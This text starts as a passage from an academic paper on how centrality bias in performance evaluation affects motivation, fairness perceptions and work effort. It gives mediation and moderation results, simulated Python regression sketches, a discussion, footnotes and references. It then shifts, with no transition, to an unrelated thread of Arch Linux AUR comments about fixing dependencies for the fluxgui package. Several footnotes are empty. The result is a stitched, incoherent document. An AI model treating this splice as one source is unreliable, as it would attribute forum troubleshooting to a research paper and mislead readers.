This pkgbuild is giving me enough trouble, and I don't even use it.
Anyone wants to maintain it?
Anonymous comment on 2010-11-02 01:47
This requires lib32-libxxf86vm if you are running on x86_64. Otherwise, you get the following error when trying to execute xflux:
xflux: error while loading shared libraries: libXxf86vm.so.1: cannot open shared object file: No such file or directory
t3ddy commented on 2010-11-01 17:55
yes I know, just decide what you want...
lachlanc commented on 2010-11-01 17:22
works with gnome-python[extra] instead of python-gconf[aur]
t3ddy commented on 2010-10-26 12:27
ok, I've added it
w1ntermute commented on 2010-10-26 02:42
Yes, it's necessary, I get this error if I don't have it installed:
Traceback (most recent call last):
File "/usr/lib/python2.7/site-packages/fluxgui/fluxgui.py", line 5, in <module>
import gconf
ImportError: No module named gconf
t3ddy commented on 2010-10-17 19:17
Is it really needed?
I don't have it installed and fluxgui seems to work.
master commented on 2010-10-17 18:45
Please make it depend on python-gconf.
t3ddy commented on 2010-10-05 07:29
@ipha
I hope I've done what you suggested correctly; anyway, do you want to maintain this pkgbuild?
ipha commented on 2010-10-05 05:30
Needs pyxdg as a dependency and it needs to be run on python2 now that python defaults to python 3.
t3ddy commented on 2010-09-29 14:04
As you can read here: this version works only on Ubuntu, so I've made a patch to make it also run on Arch.
Don't expect the patch to be well done; I know nothing about Python, so if anyone is interested in making a better patch, I'd be thankful.
|
https://aur.archlinux.org/packages/fluxgui/?comments=all
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
a WSDL interface from within JDeveloper by simply running a wizard.
Logical Connection Names
All adapters, whether they are used to connect to an FTP server or access an MQ-Series queue, use logical connection names or JNDI names that must be specified at design time. At runtime, the adapter framework uses these JNDI names to look up the physical connection data from configuration files. This mechanism works well. It ensures that the software remains unchanged as it moves through the various stages of the software development life cycle, from QA to SIT, to UAT and finally Production: only the environment-specific configuration files contain different data. Obviously, developers are required to stick to the naming conventions for the logical connection names.
Risky business
Unfortunately, for ‘convenience’ Oracle decided to place physical connection data in the generated WSDL files at design time. When the system is not able to obtain the connection details from the configuration files using the JNDI name, it will use the so-called ManagedConnectionFactory or MCF properties from the WSDL instead. This is risky business that may cause undesirable behavior: if there is a misconfiguration, the service may connect to an instance that was specified at design time without you knowing it. I prefer a clear error on which a system administrator can act appropriately by fixing the connection details in the proper configuration file. Hence, as a rule, the MCF properties need to be removed from the generated WSDL files afterwards. For inspection of the connection properties in the WSDL files I created a simple Ant script.
Requirements
My initial requirement is simple: I want an overview of the connection data for all WSDL files in the project. Typically, these are listed in the WSDL files in the following format:
<!-- /HR is missing. These 'mcf' properties are safe to remove. -->
<service name="ReadDptData">
  <port name="ReadDptData_pt" binding="tns:ReadDptData_binding">
    <jca:address
  </port>
</service>
Now, I want to check the contents of the <jca:address> element for each file. In a project I am currently working on, that literally means plowing through hundreds of files. Hence, I need a utility that automates that tedious task for me. Since we already use Ant extensively, e.g. for deploying BPEL Processes and ESB Services, the utility is implemented as an Ant build script.
Loop Constructs and XML Tasks in Ant
Out of the Apache box, Ant does not come with looping constructs. Luckily, the Ant-Contrib project provides very useful extensions to Ant, among which is a foreach task that allows looping over a set of files. Subsequently, for each file I want to display the contents of the <jca:address> element. Applying a simple XPath expression should do the trick. That is possible using yet another Ant extension, XMLTask. Putting it all together results in the following script:
<?xml version="1.0" encoding="UTF-8"?>
<project name="QA" default="list-connection-data-in-wsdl-files" basedir=".">
  <!-- QA Utilities for SOA components -->
  <property environment="env"/>
  <property name="server-src" value="${env.SOA_PROJECT_HOME}/work"/>
  <taskdef resource="net/sf/antcontrib/antcontrib.properties">
    <classpath>
      <pathelement location="${env.SOA_DA_HOME}/lib/ant-contrib-1.0b3.jar"/>
    </classpath>
  </taskdef>
  <taskdef name="xmltask" classname="com.oopsconsultancy.xmltask.ant.XmlTask">
    <classpath>
      <pathelement location="${env.SOA_DA_HOME}/lib/xmltask-v1.15.1.jar"/>
    </classpath>
  </taskdef>
  <target name="list-connection-data-in-wsdl-files">
    <foreach target="list-connection-data-in-wsdl-file" param="source-file">
      <path id="src.path">
        <fileset dir="${server-src}">
          <include name="**/*.wsdl"/>
        </fileset>
      </path>
    </foreach>
  </target>
  <target name="list-connection-data-in-wsdl-file">
    <echo message="File name: ${source-file}"/>
    <xmltask source="${source-file}">
      <copy path="descendant::*/:service/:port" buffer="connect-data-buffer"/>
      <print buffer="connect-data-buffer"/>
    </xmltask>
  </target>
</project>
When using XPath expressions in XMLTask Ant targets, like descendant::*/:service/:port in this case, the colon character is used by XMLTask to deal with local namespaces in the WSDL file. As far as I know, there is no way to pass namespace data to XMLTask (I confess that I did not spend a lot of time investigating). The XPath expressions /:service/:port/:address and /:service/:port/jca:address do not return the required results.
Room for improvements
The script that is provided here suits my needs. But as always, there is room for improvement. For one, when it does not find a <jca:address> element it reports that, whereas in that case we could opt for not even mentioning the file. Furthermore, the script could be extended to automatically remove all but the location attribute from the <jca:address> element. For that purpose, XMLTask provides options for manipulation of XML documents.
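To illustrate that last idea, here is a rough Python sketch (not the XMLTask approach described above) that strips every attribute except location from the <jca:address> elements; the directory name and the jca namespace URI are assumptions you would need to adapt to your project:

import os
import xml.etree.ElementTree as ET

# Assumed namespace URI for the jca prefix; check your generated WSDL files.
JCA_ADDRESS = '{http://xmlns.oracle.com/pcbpel/wsdl/jca/}address'

def clean_wsdl(path):
    # Drop every attribute except 'location' from jca:address elements.
    tree = ET.parse(path)
    changed = False
    for elem in tree.iter(JCA_ADDRESS):
        for name in list(elem.attrib):
            if name != 'location':
                del elem.attrib[name]
                changed = True
    if changed:
        # Note: ElementTree rewrites the file and discards comments and original prefixes.
        tree.write(path)

for dirpath, dirnames, filenames in os.walk('work'):
    for filename in filenames:
        if filename.endswith('.wsdl'):
            clean_wsdl(os.path.join(dirpath, filename))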
|
https://technology.amis.nl/2007/08/17/using-ant-to-inspect-connection-properties-in-wsdl-files-that-are-generated-by-oracle-soa-suite-adapters/
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Hello everyone, I am so close to achieving my goal with this program. I just can't seem to figure out where the for loop goes wrong and "mis-counts" the number of consonants and vowels. Also, in the else...if statement, if anyone has advice on how to make it exclude all non-letter characters (like !, -, etc.), that would help so much! Part of the consonant problem, I believe, is that it is counting spaces and other characters.
Thanks so much in advance for any help!
import java.lang.String;

public class StringProcessor {
    String string;
    int vowels;
    int consonants;

    public void Count() {
        vowels = 0;
        consonants = 0;
        for (int i = 0; i < string.length(); i++) {
            char c = string.charAt(i);
            if (c == 'a' || c == 'e' || c == 'i' || c == 'o' || c == 'u')
                vowels++;
            else if (c != 'a' || c != 'e' || c != 'i' || c != 'o' || c != 'u' || c != ' ')
                consonants++;
        }
    }

    public void display() {
        System.out.println(string + " has " + vowels + " vowels and " + consonants + " consonants.");
    }

    public StringProcessor(String aString) {
        string = aString;
    }

    public void setString(String stString) {
        string = stString;
    }
}

public class TestProcessor {
    public static void main(String[] args) {
        StringProcessor processor = new StringProcessor("Java Rules");
        processor.Count();
        processor.display();
        processor.setString("I like on-line classes");
        processor.Count();
        processor.display();
        processor.setString("Spring break was AWESOME!");
        processor.Count();
        processor.display();
    }
}
The output is supposed to look like this:
"Java Rules" has 4 vowels and 5 consonants
"I like on-line classes" has 8 vowels and 10 consonants
"Spring break was AWESOME!" has 8 vowels and 13 consonants
And I get this:
Java Rules has 4 vowels and 6 consonants.
I like on-line classes has 7 vowels and 15 consonants.
Spring break was AWESOME! has 4 vowels and 21 consonants.
Thanks again!
|
http://www.javaprogrammingforums.com/whats-wrong-my-code/7653-counting-vowels-consonants-string.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Not that it is needed, since web2py already exports in CSV, but you can define
def export_xml(rows):
    idx = range(len(rows.colnames))
    colnames = [item.replace('.', '_') for item in rows.colnames]
    records = []
    for row in rows.response:
        records.append(TAG['record'](*[TAG[colnames[i]](row[i]) for i in idx]))
    return str(TAG['records'](*records))
Now if you have a model like
db = SQLDB('sqlite://test.db')
db.define_table('mytable', SQLField('myfield'))
for i in range(100):
    db.mytable.insert(myfield=i)
you can get your data in XML by doing
print export_xml(db().select(db.mytable.ALL))
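If you want to expose the XML over HTTP, a controller action along these lines would work (a sketch; it assumes the export_xml function and the model above are available to your application):

def mytable_xml():
    # Hypothetical web2py controller action returning the table as XML
    response.headers['Content-Type'] = 'text/xml'
    return export_xml(db().select(db.mytable.ALL))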
Notice that
TAG.name('a','b',c='d')
and
TAG['name']('a','b',c='d')
both generate the following XML
<name c="d">ab</name>
where 'a', 'b' and 'd' are escaped as appropriate. Using TAG you can generate any HTML/XML tag you need that is not already provided in the API. TAGs can be nested and are serialized with str()
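For instance (a quick illustration, not part of the original post), nesting and serializing looks like this:

row = TAG['record'](TAG['name']('Bob & Alice'), TAG['count'](2))
print str(TAG['records'](row))
# roughly: <records><record><name>Bob &amp; Alice</name><count>2</count></record></records>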
|
http://www.web2py.com/AlterEgo/default/show/74
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
On Thu, 2003-07-31 at 13:42, Glenn Sieb wrote:
> Jim Breton said:
> > I have set up the above on a FreeBSD 4.7 system with the intention of
> > being able to host per-virtual-domain mailing lists.
>
> Yay! Another FBSD user! :)
>
> > I want to be able to have:
> >
> > list01 at domain1.com
> > and
> > list01 at domain2.com
> >
> > as completely separate, autonomous lists.
>
> Can't do it :( It'd have to be:
>
> list01 at domain1.com
> list02 at domain2.com
>
> If Mailman had a little more (no offense, I just can't think of a better
> term to use) intelligence in it, when you set up for virtual domains it'd
> do things like create a directory namespace like
> /usr/local/mailman/lists/domain2.com/, etc. so you *could* put lists with
> the same name in different domains...

Well, technically, you could have two or more parallel installs of Mailman. There are quite a few folks who do that when they have just a few virtual domains to worry about.

Also, you can alias list01 at domain2.com ==> list01-domain2 and let the (hidden) real name of the list be list01-domain2. Of course, then you have to do a lot of editing of the web pages to display the domain information that you want. That is the way I normally do it. The web pages all alias properly, as do the email addresses, so the end user is none the wiser.

And yes, it sure would be easier if Mailman used only the virtual host information when setting up its web pages and sending out its emails.

Good Luck
|
https://mail.python.org/pipermail/mailman-users/2003-July/030743.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
There is an open source program called MSWordView that is able to
convert a MS Word 97 table into HTML. I tried version 0.7.4 of abiword
and it does not handle tables well (if at all). I have a friend who
could end his dual boot days if he had a piece of software on Linux that
could import and export tables in MS Word 97 format. Is there a plan to
work on tables in the future, which has just not been begun? Didn't
there used to be a roadmap of features on the abisource web site? I
can't find it. Also, there was a great article at the inception of
Abiword about a certain feature that was in Word that would never be
included in Abiword. It was a feature that was incredibly obscure and
of little use to most people (if anyone). I can't find that article, if
anyone knows what I am babbling about. Anyway, back to my original
point. MSWordView's home page is at and it is GPL'd so the
Abiword developers should be able to use the code to improve the Word 97
import features. Maybe they already know about this code and it is just
incompatible with the abiword architecture. I don't know. I'd like to
know.
Keith Wear
|
http://www.abisource.com/mailinglists/abiword-user/99/August/0013.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Microsoft .NET Framework 3.0 Programming Model
Microsoft .NET Framework 3.0, the managed programming model for Microsoft® Windows®, includes the .NET Framework 2.0, Windows Presentation Foundation, Windows Communication Foundation, and Windows Workflow Foundation.
The documentation, samples, and tools provided in this release are preliminary and subject to change. It is recommended that you use this preliminary release of the Windows SDK in a test environment.
Documentation - The documentation contains API reference topics, task-based, how-to documentation and feature overviews to help you understand how to use .NET Framework 3.0 APIs in an application. To locate the topics you need, you can use Search, Index, the Table of Contents, or the navigational topics in the documentation viewer.
Samples - The code samples are provided in one or more of the following languages: Visual Basic, C#, and C++. You can locate and view samples, organized by technology, by opening the Samples node in the TOC. The “Technology Samples” sub-nodes contain samples that are generally brief and focused around a particular aspect of a technology. The “Application Samples” sub-nodes contain samples that are larger and more complex applications that demonstrate how to use the API to construct a rich real-world application.
Tools - The Windows SDK includes an extensive set of tools to assist you in developing .NET Framework 3.0 applications.
Sending Feedback - We are in the early stages of creating the documentation and samples, and many topics are incomplete or do not yet exist. If you have suggestions for topics we should write or how we can improve the Windows SDK, please send them to us using the link available at the bottom of each topic in the documentation.
In This Section
- Feature Area Overviews
Find concept-based lists of relevant links to information about topics such as Presentation, Communication, Data Migration and Interoperability, and Security.
- .NET Framework Technologies
Find information about the .NET Framework 2.0, including what's new in this version of the .NET Framework, overviews, and guidelines and best practices.
- ASP.NET Web Applications
Find information about creating ASP.NET Web applications, developing custom server controls, and XML Web Services created using ASP.NET.
- Windows Forms
Find information about Windows Forms architecture, events, controls, data architecture, graphics, and drawing in Windows Forms.
- Windows Communication Foundation
Find information about using Windows Communication Foundation to develop reliable, secure, transacted services for communication between systems.
- Windows Presentation Foundation
Find information about building and deploying Windows Presentation Foundation applications, including the user interface, data binding, graphics and multimedia.
- Windows Workflow Foundation
Find information about building and deploying Windows Workflow Foundation applications.
- Samples
Find code examples for .NET Framework 3.0 technologies, including smaller technology-focused samples and larger application-type samples.
- .NET Framework 3.0 Tools
Information about the tools available with the SDK to make it easier for you to create and deploy managed applications and components that target .NET Framework 3.0.
- General Reference
Language reference information, compiler reference, and additional reference information for Windows Communication Foundation and Windows Workflow Foundation.
- Class Library
Contains syntax and examples for all public classes within the .NET Framework 3.0 API set.
|
https://msdn.microsoft.com/en-us/library/ms687300.aspx
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
In this tutorial, we're going to write a very simple GTK application that loads and displays an image file. You will learn how to:
Write a basic GTK user interface in Python
Deal with events by connecting signals to signal handlers
Lay out GTK user interfaces using containers
Load and display image files
You'll need the following to be able to follow this tutorial:
Before you start coding, you'll need to set up a new project in Anjuta. This will create all of the files you need to build and run the code later on. It's also useful for keeping everything together.
Start Anjuta and click File ▸ New ▸ Project to open the project wizard.
Choose PyGTK (automake) from the Python tab, click Continue, and fill out your details on the next few pages. Use image-viewer as project name and directory.
Be sure to disable Use GtkBuilder for user interface as we will build the user interface manually in this example. For an example of using the interface designer, check the Guitar-Tuner demo.
Click Apply and the project will be created for you. Open src/image_viewer.py from the Project or File tabs. It contains very basic example code.
Let's see what a very basic Gtk application looks like in Python:
from gi.repository import Gtk, GdkPixbuf, Gdk
import os, sys

class GUI:
    def __init__(self):
        window = Gtk.Window()
        window.set_title("Hello World")
        window.connect_after('destroy', self.destroy)
        window.show_all()

    def destroy(self, window):
        Gtk.main_quit()

def main():
    app = GUI()
    Gtk.main()

if __name__ == "__main__":
    sys.exit(main())
Let's take a look at what's happening:
The first line imports the Gtk namespace (that is, it includes the Gtk library). The libraries are provided by GObject Introspection (gi), which provides language bindings for many GNOME libraries.
The __init__ method of the GUI class creates an (empty) Gtk.Window, sets its title, and then connects a signal to quit the application once the window is closed. That's pretty simple overall; more on signals later.
Next, destroy is defined which just quits the application. It is called by the destroy signal connected above.
The rest of the file does initialisation for Gtk and displays the GUI.
This code is ready to run, so try it using Run ▸ Execute. It should show you an empty window.
Signals are one of the key concepts in Gtk programming. Whenever something happens to an object, it emits a signal; for example, when a button is clicked it gives off the clicked signal. If you want your program to do something when that event occurs, you must connect a function (a "signal handler") to that signal. Here's an example:
def button_clicked(button):
    print "you clicked me!"

b = Gtk.Button("Click me")
b.connect_after('clicked', button_clicked)
The last two lines create a Gtk.Button called b and connect its clicked signal to the button_clicked function, which is defined above. Every time the button is clicked, the code in the button_clicked function will be executed. It just prints a message here.
Widgets (controls, such as buttons and labels) can be arranged in the window by making use of containers. You can organize the layout by mixing different types of containers, like boxes and grids.
A Gtk.Window is itself a type of container, but you can only put one widget directly into it. We would like to have two widgets, an image and a button, so we must put a "higher-capacity" container inside the window to hold the other widgets. A number of container types are available, but we will use a Gtk.Box here. A Gtk.Box can hold several widgets, organized horizontally or vertically. You can do more complicated layouts by putting several boxes inside another box and so on.
There is a graphical user interface designer called Glade integrated in Anjuta which makes UI design really easy. For this simple example, however, we will code everything manually.
Let's add the box and widgets to the window. Insert the following code into the __init__ method, immediately after the window.connect_after line:
box = Gtk.Box()
box.set_spacing(5)
box.set_orientation(Gtk.Orientation.VERTICAL)
window.add(box)
The first line creates a Gtk.Box called box and the following lines set two of its properties: the orientation is set to vertical (so the widgets are arranged in a column), and the spacing between the widgets is set to 5 pixels. The next line then adds the newly-created Gtk.Box to the window.
So far the window only contains an empty Gtk.Box, and if you run the program now you will see no changes at all (the Gtk.Box is a transparent container, so you can't see that it's there).
To add some widgets to the Gtk.Box, insert the following code directly below the window.add (box) line:
self.image = Gtk.Image()
box.pack_start(self.image, True, True, 0)
The first line creates a new Gtk.Image called image, which will be used to display an image file. As we need that later on in the signal handler, we will define it as a class-wide variable. You need to add image = 0 to the beginning of the GUI class. Then, the image widget is added (packed) into the box container using GtkBox's pack_start method.
pack_start takes 4 arguments: the widget that is to be added to the GtkBox (child); whether the Gtk.Box should grow larger when the new widget is added (expand); whether the new widget should take up all of the extra space created if the Gtk.Box gets bigger (fill); and how much space there should be, in pixels, between the widget and its neighbors inside the Gtk.Box (padding).
Gtk containers (and widgets) dynamically expand to fill the available space, if you let them. You don't position widgets by giving them a precise x,y-coordinate location in the window; rather, they are positioned relative to one another. This makes handling window resizing much easier, and widgets should automatically take a sensible size in most situations.
Also note how the widgets are organized in a hierarchy. Once packed in the Gtk.Box, the Gtk.Image is considered a child of the Gtk.Box. This allows you to treat all of the children of a widget as a group; for example, you could hide the Gtk.Box, which would also hide all of its children at the same time.
Now insert these two lines, below the two you just added:
button = Gtk.Button("Open a picture...")
box.pack_start(button, False, False, 0)
These lines are similar to the first two, but this time they create a Gtk.Button and add it to box. Notice that we are setting the expand argument (the second one) to False here, whereas it was set to True for the Gtk.Image. This will cause the image to take up all available space and the button to take only the space it needs. When you maximize the window, the button size will remain the same, but the image size will increase, taking up all of the rest of the window.
When the user clicks on the Open Image... button, a dialog should appear so that the user can choose a picture. Once chosen, the picture should be loaded and shown in the image widget.
The first step is to connect the clicked signal of the button to a signal handler function, which we call on_open_clicked. Put this code immediately after the button = Gtk.Button() line where the button was created:
button.connect_after('clicked', self.on_open_clicked)
This will connect the clicked signal to on_open_clicked method that we will define below.
Now we can create the on_open_clicked method. Insert the following into the GUI class code block, after the __init__ method:
def on_open_clicked(self, button):
    dialog = Gtk.FileChooserDialog("Open Image",
                                   button.get_toplevel(),
                                   Gtk.FileChooserAction.OPEN)
    dialog.add_button(Gtk.STOCK_CANCEL, 0)
    dialog.add_button(Gtk.STOCK_OK, 1)
    dialog.set_default_response(1)

    filefilter = Gtk.FileFilter()
    filefilter.add_pixbuf_formats()
    dialog.set_filter(filefilter)

    if dialog.run() == 1:
        self.image.set_from_file(dialog.get_filename())

    dialog.destroy()
This is a bit more complicated than anything we've attempted so far, so let's break it down:
The line beginning with dialog creates an Open dialog, which the user can use to choose files. We set three properties: the title of the dialog; the action (type) of the dialog (it's an "open" dialog, but we could have used SAVE if the intention was to save a file); and transient_for, which sets the parent window of the dialog.
The next two lines add Cancel and Open buttons to the dialog. The second argument of the add_button method is the (integer) value that is returned when the button is pressed: 0 for Cancel and 1 for Open.
Notice that we are using stock button names from Gtk, instead of manually typing "Cancel" or "Open". The advantage of using stock names is that the button labels will already be translated into the user's language.
set_default_response determines the button that will be activated if the user double-clicks a file or presses Enter. In our case, we are using the Open button as default (which has the value 1).
The next three lines restrict the Open dialog to only display files which can be opened by Gtk.Image. A filter object is created first; we then add all kinds of files supported by Gdk.Pixbuf (which includes most image formats like PNG and JPEG) to the filter. Finally, we set this filter to be the Open dialog's filter.
dialog.run displays the Open dialog. The dialog will wait for the user to choose an image; when they do, dialog.run will return the value 1 (it would return 0 if the user clicked Cancel). The if statement tests for this.
Assuming that the user did click Open, the next line sets the file property of the Gtk.Image to the filename of the image selected by the user. The Gtk.Image will then load and display the chosen image.
In the final line of this method, we destroy the Open dialog because we don't need it any more.
All of the code you need should now be in place, so try running the code. That should be it; a fully-functioning image viewer (and a whistlestop tour of Python and Gtk) in not much time at all!
If you run into problems with the tutorial, compare your code with this reference code.
Here are some ideas for how you can extend this simple demonstration:
Have the user select a directory rather than a file, and provide controls to cycle through all of the images in a directory (a rough sketch follows this list).
Apply random filters and effects to the image when it is loaded and allow the user to save the modified image.
GEGL provides powerful image manipulation capabilities.
Allow the user to load images from network shares, scanners, and other more complicated sources.
You can use GIO to handle network file transfers and the like, and GNOME Scan to handle scanning.
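For the first idea above, a minimal sketch might look like the following (hypothetical method names, assumed to be added to the GUI class and wired to a Next button):

import os

IMAGE_EXTENSIONS = ('.png', '.jpg', '.jpeg', '.gif')   # assumed set of formats

def load_directory(self, path):
    # Collect the image files in the chosen directory, in a stable order
    self.folder = path
    self.files = sorted(f for f in os.listdir(path)
                        if f.lower().endswith(IMAGE_EXTENSIONS))
    self.index = 0
    if self.files:
        self.show_current()

def show_current(self):
    # Display the image at the current position
    self.image.set_from_file(os.path.join(self.folder, self.files[self.index]))

def on_next_clicked(self, button):
    # Advance to the next image, wrapping around at the end of the list
    if self.files:
        self.index = (self.index + 1) % len(self.files)
        self.show_current()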
|
https://developer.gnome.org/gnome-devel-demos/stable/image-viewer.py.html.en
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Scenario Marker Support
The Scenario class is a free download on the MSDN Code Gallery Web site. By using Scenario, you can mark the exact beginning and ending points of a section of code that you want to profile. Concurrency Visualizer displays these markers in Threads View, Cores View, and CPU Utilization View. To display the name that you gave the marker, rest the pointer on its horizontal bar.
Concurrency Visualizer supports Scenario markers in both native code and managed code, subject to the following conditions:
The Scenario.Begin, Scenario.BeginNew, and Scenario.End methods are supported. The Scenario.Mark and Scenario.Step methods are not supported.
Scenario markers that have a Nest Level greater than zero are not supported.
One active Scenario instance per thread is tracked. If a Scenario.Begin event is received when a Scenario instance is already active, Concurrency Visualizer will overwrite the old value with the new value. An active Scenario instance will be closed on the first Scenario.End call in the thread, regardless of the Scenario instance it came from.
To add Scenario markers to code
Download Scenario.zip from Scenario Home Page on the MSDN Code Gallery Web site.
Uncompress the file and note where the folder is created.
In your Visual Studio project, add a reference to the appropriate Scenario native or managed .dll file. x86 and x64 versions are provided for both Visual Studio 2008 and Visual Studio 2010.
In managed code, add a using or Imports statement for the Scenario namespace.
In native code, add the Scenario.h file, which is located in the \native\ folder.
Create an instance of the Scenario class on every thread that you want to mark. Use the constructor to add a name for the marker so that it will appear in Concurrency Visualizer.
Call the Begin method where you want to put the beginning marker.
Call the End method where you want to put the end marker.
Run Concurrency Visualizer. The markers should appear in the various views.
For more information about the Scenario class, see the documentation on the Scenario Home Page.
|
https://msdn.microsoft.com/en-us/library/dd984115(v=vs.100).aspx
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
I regularly have to work with XML files which are presented without line breaks, which makes tracking down errors much harder than it needs to be. I'd also like a way to line up comma-separated data into fixed-width columns, e.g.
one,two,three,four,five
six,seven,eight,nine,ten
becomes
one,two ,three,four,five
six,seven,eight,nine,ten
Any ideas as to how I could do this?
Cheers,Mick
Hi Mick,
I use the following plugin for tidying XML. If there is a filename in the clipboard it will tidy that file, otherwise it will tidy the active view. It will only tidy a file if it contains well-formed xml (without this restriction I had a problem with clobbering non-xml files). You might want to play with the command line parameters passed to the tidy program it uses.
This works on Windows only; it requires the "tidy" application (from tidy.sourceforge.net). Ideally it would be changed to use one of the python XML-tidy libraries, but I wasn't sure (1) how to include an external dependency and (2) which library to use.
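For what it's worth, a pure-Python variant could lean on the standard library instead of tidy.exe. A minimal sketch (it assumes the input is already well-formed, and its formatting is cruder than tidy's):

from xml.dom import minidom

def tidy_string(xml_text):
    # Re-indent a well-formed XML document using only the standard library
    return minidom.parseString(xml_text).toprettyxml(indent='    ')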
Anyway, hope it helps.
Cheers,
Josh
'''
.
Disclaimer:
This comes with no warranty. Use at your own risk.
Installation:
Download and install tidy.sourceforge.net and update the path below accordingly (TIDY_EXE)
Add the appropriate keyboard shortcuts from "Preferences" \ "User Key Bindings":
{ "keys": "alt+t"], "command": "xml_tidy" }
'''
import sublime, sublime_plugin
import os
from subprocess import Popen
from xml.sax.handler import ContentHandler
from xml.sax import make_parser
TIDY_EXE = 'C:/path/to/tidy.exe'
class XmlTidyCommand(sublime_plugin.TextCommand):
    def run(self, edit):
        """If there is a filename in the clipboard then tidy it, otherwise tidy the current view"""
        clip = sublime.get_clipboard()
        filepath = (clip if os.path.isfile(clip) else self.view.file_name())
        self.tidy_file(filepath)

    def tidy_file(self, filepath):
        """
        Gets the filename of the current view and tries to tidy it.
        The tidy will only be attempted for well-formed XML documents.
        For command-line options, see
        """
        if not os.path.isfile(filepath):
            self.alert('Unable to tidy the current file. Please save the file first.')
        elif self.is_well_formed(filepath):
            self.alert('Tidying file "%s"' % (filepath))
            Popen('"%s" -q -xml -i -u -m -w 120 "%s"' % (TIDY_EXE, os.path.normpath(filepath)))
        else:
            self.alert('Aborting tidy - the file does not contain well-formed xml ("%s")' % (filepath))

    def is_well_formed(self, filepath):
        """Adopted from:"""
        parser = make_parser()
        parser.setContentHandler(ContentHandler())
        well_formed = True
        try:
            parser.parse(filepath)
        except Exception, e:
            well_formed = False
        return well_formed

    def alert(self, message):
        """Display a status message in Sublime Text and also write to the console"""
        print 'XmlTidy: ' + message
        sublime.status_message(message)
Thanks for that Josh, I'll give it a try.
...and here is a plugin for the 'convert to fixed column' functionality. The plugin will take each selection and apply the "fixed columns" formatting independently. To apply this to a whole file, just 'select all' then run the plugin. If you don't like the results then an undo will bring you back to the previous state.
I'm new to python so there may be more efficient ways to do this, but it seems to work. It was a fun problem to solve and learn a bit more about python. Definitely a cool language.
'''
.
'''
import sublime_plugin
SPLIT_CHAR = ','
# convert_to_fixed_column
class ConvertToFixedColumnCommand(sublime_plugin.TextCommand):
    def run(self, edit):
        for region in self.view.sel():
            self.view.replace(edit, region, self.align_content(self.view.substr(region)))

    def align_content(self, content):
        # calculate the max width for each column
        lines = []
        widths = []
        for text in iter(content.splitlines()):
            line = text.split(SPLIT_CHAR)
            lines.append(line)
            for (cell_idx, cell_val) in enumerate(line):
                if cell_idx >= len(widths):
                    widths.append(0)
                widths[cell_idx] = max(widths[cell_idx], len(cell_val))
        # format each cell to the max width
        output = []
        for line in lines:
            for col_idx in range(len(line)):
                mask = '%%0%ds' % (widths[col_idx])
                line[col_idx] = mask % line[col_idx]
            output.append(SPLIT_CHAR.join(line))
        # make sure that the trailing newline is saved (if there was one)
        if content.endswith('\n'):
            output.append('')
        return '\n'.join(output)
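One note on the mask: '%%0%ds' expands to something like '%05s', which right-justifies each cell within its column (the 0 flag is ignored for strings). A quick check, assuming Python 2 as in the plugin:

mask = '%%0%ds' % 5
print '[' + (mask % 'two') + ']'   # prints [  two]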
Many thanks for that, Josh, it's much appreciated.
|
https://forum.sublimetext.com/t/formatting-data/1544/3
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
John. I'd like to thank my family for their continuous support. Elena Renard and Joakim Erdfelt for their many contributions to the book. Ruel Loehr. Jason. and the teammates during my time at Softgal. Emmanuel Venisse and John Tolentino. Stephane Nicoll. Allan Ramirez. Felipe Leme. Also. Thanks also to all the people in Galicia for that delicious food I miss so much when traveling around the world. Napoleon Esmundo C. Tim O'Brien. Lester Ecarma. Bill Dudney. Abel Rodriguez. It is much appreciated. Carlos Sanchez Many thanks to Jesse McConnell for his contributions to the book. All of us would like to thank Lisa Malgeri. we would like to thank all the reviewers who greatly enhanced the content and quality of this book: Natalie Burdick.I would like to thank professor Fernando Bellas for encouraging my curiosity about the open source world. especially my parents and my brother for helping me whenever I needed. Fabrice Bellingard. Mark Hobson. Chris Berry. Ramirez. David Blevins. for accepting my crazy ideas about open source. Brett and Carlos . Vincent. Jerome Lacoste. Finally.
and in 2005. John Casey became involved in the Maven community in early 2002. When he's not working on Maven. where he is the technical director of Pivolis. roasting coffee. Brett has become involved in a variety of other open source projects. John enjoys amateur astrophotography. Australia. and is a Member of the Apache Software Foundation. software development. Additionally. Florida with his wife. when he began looking for something to make his job as Ant “buildmeister” simpler. Carlos Sanchez received his Computer Engineering degree in the University of Coruña. discovering Maven while searching for a simpler way to define a common build process across projects. Emily. In addition to his work on Maven. He enjoys cycling and raced competitively when he was younger. which has led to the founding of the Apache Maven project. joining the Maven Project Management Committee (PMC) and directing traffic for both the 1. financial. This is Vincent's third book. a company which specializes in collaborative offshore software development using Agile methodologies. CSSC. Jason van Zyl focuses on improving the Software Development Infrastructure associated with medium to large scale projects. as well as to various Maven plugins. Brett Porter has been involved in the Apache Maven project since early 2003. of course..About the Authors Vincent Massol has been an active participant in the Maven community as both a committer and a member of the Project Management Committee (PMC) since Maven's early days in 2002. where he hopes to be able to make the lives of other developers easier. John was elected to the Maven Project Management Committee (PMC). Brett is a co-founder and the Director of Engineering at Mergere. specializing in open source consulting. Vincent has directly contributed to Maven's core. He continues to work directly on Maven and serves as the Chair of the Apache Maven Project Management Committee. . John lives in Gainesville. supporting both European and American companies to deliver pragmatic solutions for a variety of business problems in areas like e-commerce.. and today a large part of John's job focus is to continue the advancement of Maven as a premier software development tool.0 major releases. he founded the Jakarta Cactus project-a simple testing framework for server-side Java code and the Cargo project-a J2EE container manipulation framework. Jason van Zyl: As chief architect and co-founder of Mergere. published by O'Reilly in 2005 (ISBN 0-596-00750-7). telecommunications and. his focus in the Maven project has been the development of Maven 2. published by Manning in 2003 (ISBN 1-930-11099-5) and Maven: A Developer's Notebook. Build management and open source involvement have been common threads throughout his professional career. Brett became increasingly involved in the project's development. he is a co-author of JUnit in Action. Inc.0 and 2. Immediately hooked. Spain. Vincent lives and works in Paris. He was invited to become a Maven committer in 2004. Inc. He is grateful to work and live in the suburbs of Sydney. Since 2004. He created his own company. and working on his house. and started early in the open source technology world.
